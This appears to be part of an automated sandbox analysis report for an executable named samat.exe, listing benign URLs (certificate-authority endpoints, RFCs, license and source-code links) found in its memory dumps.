Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559388808.000001BCCC857000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://google.com/mail/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.es
Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.es0
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.accv.esS
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561839036.000001BCCCC00000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
Source: svchost.exe, 00000019.00000002.6314363798.0000022FAD702000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://passport.net/tb
Source: samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://repository.swisssign.com/
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563998531.000001BCCD441000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
Source: samat.exe, 00000008.00000003.4500352032.000001BCCC830000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561108918.000001BCCCA7C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCA76000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4516102312.000001BCCC834000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4559388808.000001BCCC857000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCA79000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCCA43000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529948916.000001BCCC84F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529095803.000001BCCC843000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4506592053.000001BCCC832000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCA78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc4880
Source: samat.exe, 00000008.00000002.4565677561.000001BCCDDBC000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565677561.000001BCCDDE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc5234
Source: samat.exe, 00000008.00000002.4565419860.000001BCCDB6C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc5297
Source: samat.exe, 00000008.00000003.4534182312.000001BCCD3E7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc5869
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: samat.exe, 00000008.00000002.4565677561.000001BCCDDBC000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4565677561.000001BCCDDE4000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://tools.ietf.org/html/rfc6455#section-5.2
Source: samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550085157.000001BCCD43D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550021328.000001BCCCAC9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561290600.000001BCCCACD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517675683.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4550021328.000001BCCCAC9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4547576732.000001BCCCAB1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523371311.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4561290600.000001BCCCACD000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4526519071.000001BCCCAAA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlD
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/legislacion_c.htm
Source: samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es/legislacion_c.htm2
Source: samat.exe, 00000008.00000003.4516609829.000001BCCCAF7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499869498.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4508675111.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522465597.000001BCCD32F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4523681717.000001BCCD337000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515226012.000001BCCCADC000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3922811195.000001BCCCAA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.accv.es00
Source: samat.exe, 00000007.00000003.2997340150.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/
Source: samat.exe, 00000007.00000003.2999845052.00000209A4401000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2997340150.00000209A4400000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2997340150.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4525592506.000001BCCD3F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4564064125.000001BCCD44C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4499341916.000001BCCC9FF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4560683562.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4532754927.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4530993878.000001BCCD44A000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4529014883.000001BCCD406000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527548212.000001BCCCA03000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563798977.000001BCCD40E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3020584454.000001BCCC37F000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024391863.000001BCCC374000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: samat.exe, 00000008.00000003.4515697372.000001BCCD327000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/
Source: samat.exe, 00000008.00000003.4502629731.000001BCCC96C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4527808216.000001BCCC98D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514102538.000001BCCC983000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513322534.000001BCCC97D000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4517233682.000001BCCC984000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC8E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/t
Source: samat.exe, 00000008.00000003.4527418573.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4546531019.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4531996429.000001BCCD42C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4563930588.000001BCCD439000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
Source: samat.exe, 00000007.00000003.2997008876.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993610327.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989338500.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2991531325.00000209A43FA000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989752396.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987489165.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2993780081.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988899702.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987837380.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000154465.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988479692.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2987342767.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994879028.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988764438.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989050874.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2994092241.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988647616.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988013120.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.3000614985.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2989565209.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000007.00000003.2988317313.00000209A43F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: samat.exe, 00000008.00000003.4519025828.000001BCCD377000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4513874113.000001BCCC714000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4518791762.000001BCCC718000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000002.4558325205.000001BCCC719000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4514877809.000001BCCD360000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4509940106.000001BCCC711000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: samat.exe, 00000008.00000003.3025267001.000001BCCC8ED000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8ED000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4520994875.000001BCCC8D4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8C4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
